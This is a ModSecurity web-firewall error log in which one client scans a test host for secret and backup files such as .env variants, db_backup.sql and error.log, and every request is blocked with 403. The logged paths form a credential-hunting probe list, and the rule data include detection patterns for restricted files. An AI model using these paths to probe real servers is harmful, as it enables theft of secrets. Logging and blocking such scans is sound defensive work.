[Wed Jan 14 17:35:31.402674 2026] [:error] [pid 1413483] [client 34.220.197.24:47966] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWfF00Ev6TAVy2O49w-G4AAAAAU"]
[Wed Jan 14 17:35:31.402991 2026] [:error] [pid 1413483] [client 34.220.197.24:47966] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWfF00Ev6TAVy2O49w-G4AAAAAU"]
[Wed Jan 14 17:35:31.403148 2026] [:error] [pid 1413483] [client 34.220.197.24:47966] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/db_backup.sql"] [unique_id "aWfF00Ev6TAVy2O49w-G4AAAAAU"]
[Wed Jan 14 17:35:32.119769 2026] [:error] [pid 1413484] [client 34.220.197.24:48150] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWfF1Pcsqy-MSlD5wL45GwAAAAY"]
[Wed Jan 14 17:35:32.119988 2026] [:error] [pid 1413484] [client 34.220.197.24:48150] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWfF1Pcsqy-MSlD5wL45GwAAAAY"]
[Wed Jan 14 17:35:32.120924 2026] [:error] [pid 1413484] [client 34.220.197.24:48150] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aWfF1Pcsqy-MSlD5wL45GwAAAAY"]
[Wed Jan 14 17:35:32.841659 2026] [:error] [pid 1413459] [client 34.220.197.24:48350] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWfF1EmBk0CuCHAyPqetJAAAAAM"]
[Wed Jan 14 17:35:32.841870 2026] [:error] [pid 1413459] [client 34.220.197.24:48350] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWfF1EmBk0CuCHAyPqetJAAAAAM"]
[Wed Jan 14 17:35:32.842047 2026] [:error] [pid 1413459] [client 34.220.197.24:48350] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/includes/.env"] [unique_id "aWfF1EmBk0CuCHAyPqetJAAAAAM"]
[Wed Jan 14 17:35:33.561982 2026] [:error] [pid 1413458] [client 34.220.197.24:48562] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWfF1cPNANEsYGk5QcxtGAAAAAI"]
[Wed Jan 14 17:35:33.562191 2026] [:error] [pid 1413458] [client 34.220.197.24:48562] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWfF1cPNANEsYGk5QcxtGAAAAAI"]
[Wed Jan 14 17:35:33.562387 2026] [:error] [pid 1413458] [client 34.220.197.24:48562] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aWfF1cPNANEsYGk5QcxtGAAAAAI"]
[Wed Jan 14 17:35:34.280830 2026] [:error] [pid 1413460] [client 34.220.197.24:48762] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWfF1gByDtVd7SkMa28kaQAAAAQ"]
[Wed Jan 14 17:35:34.281050 2026] [:error] [pid 1413460] [client 34.220.197.24:48762] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWfF1gByDtVd7SkMa28kaQAAAAQ"]
[Wed Jan 14 17:35:34.281238 2026] [:error] [pid 1413460] [client 34.220.197.24:48762] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aWfF1gByDtVd7SkMa28kaQAAAAQ"]
[Wed Jan 14 17:35:35.003019 2026] [:error] [pid 1413457] [client 34.220.197.24:48974] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWfF19edw_XRw0xH6MrJUwAAAAE"]
[Wed Jan 14 17:35:35.003331 2026] [:error] [pid 1413457] [client 34.220.197.24:48974] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWfF19edw_XRw0xH6MrJUwAAAAE"]
[Wed Jan 14 17:35:35.003494 2026] [:error] [pid 1413457] [client 34.220.197.24:48974] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/error.log"] [unique_id "aWfF19edw_XRw0xH6MrJUwAAAAE"]
[Wed Jan 14 17:35:35.724123 2026] [:error] [pid 1413456] [client 34.220.197.24:49192] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWfF18FbvLGMHoHvQxNzMgAAAAA"]
[Wed Jan 14 17:35:35.724336 2026] [:error] [pid 1413456] [client 34.220.197.24:49192] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWfF18FbvLGMHoHvQxNzMgAAAAA"]
[Wed Jan 14 17:35:35.724503 2026] [:error] [pid 1413456] [client 34.220.197.24:49192] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aWfF18FbvLGMHoHvQxNzMgAAAAA"]
[Wed Jan 14 17:35:36.445997 2026] [:error] [pid 1413485] [client 34.220.197.24:49414] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWfF2Lz8c3lrfqFQknOrdQAAAAc"]
[Wed Jan 14 17:35:36.446198 2026] [:error] [pid 1413485] [client 34.220.197.24:49414] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWfF2Lz8c3lrfqFQknOrdQAAAAc"]
[Wed Jan 14 17:35:36.446402 2026] [:error] [pid 1413485] [client 34.220.197.24:49414] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aWfF2Lz8c3lrfqFQknOrdQAAAAc"]
[Wed Jan 14 17:35:37.168513 2026] [:error] [pid 1413483] [client 34.220.197.24:49606] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWfF2UEv6TAVy2O49w-G4QAAAAU"]
[Wed Jan 14 17:35:37.169721 2026] [:error] [pid 1413483] [client 34.220.197.24:49606] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWfF2UEv6TAVy2O49w-G4QAAAAU"]
[Wed Jan 14 17:35:37.169911 2026] [:error] [pid 1413483] [client 34.220.197.24:49606] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.sample"] [unique_id "aWfF2UEv6TAVy2O49w-G4QAAAAU"]
[Wed Jan 14 17:35:37.889779 2026] [:error] [pid 1413484] [client 34.220.197.24:49810] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWfF2fcsqy-MSlD5wL45HAAAAAY"]
[Wed Jan 14 17:35:37.889985 2026] [:error] [pid 1413484] [client 34.220.197.24:49810] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWfF2fcsqy-MSlD5wL45HAAAAAY"]
[Wed Jan 14 17:35:37.890147 2026] [:error] [pid 1413484] [client 34.220.197.24:49810] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aWfF2fcsqy-MSlD5wL45HAAAAAY"]
[Wed Jan 14 17:35:44.411757 2026] [:error] [pid 1413459] [client 34.220.197.24:51374] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWfF4EmBk0CuCHAyPqetJgAAAAM"]
[Wed Jan 14 17:35:44.411977 2026] [:error] [pid 1413459] [client 34.220.197.24:51374] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWfF4EmBk0CuCHAyPqetJgAAAAM"]
[Wed Jan 14 17:35:44.412153 2026] [:error] [pid 1413459] [client 34.220.197.24:51374] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWfF4EmBk0CuCHAyPqetJgAAAAM"]
[Wed Jan 14 17:35:45.132944 2026] [:error] [pid 1413458] [client 34.220.197.24:51544] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWfF4cPNANEsYGk5QcxtGgAAAAI"]
[Wed Jan 14 17:35:45.133161 2026] [:error] [pid 1413458] [client 34.220.197.24:51544] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWfF4cPNANEsYGk5QcxtGgAAAAI"]
[Wed Jan 14 17:35:45.133339 2026] [:error] [pid 1413458] [client 34.220.197.24:51544] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aWfF4cPNANEsYGk5QcxtGgAAAAI"]
[Wed Jan 14 17:35:45.848994 2026] [:error] [pid 1413460] [client 34.220.197.24:51732] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWfF4QByDtVd7SkMa28kawAAAAQ"]
[Wed Jan 14 17:35:45.849153 2026] [:error] [pid 1413460] [client 34.220.197.24:51732] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWfF4QByDtVd7SkMa28kawAAAAQ"]
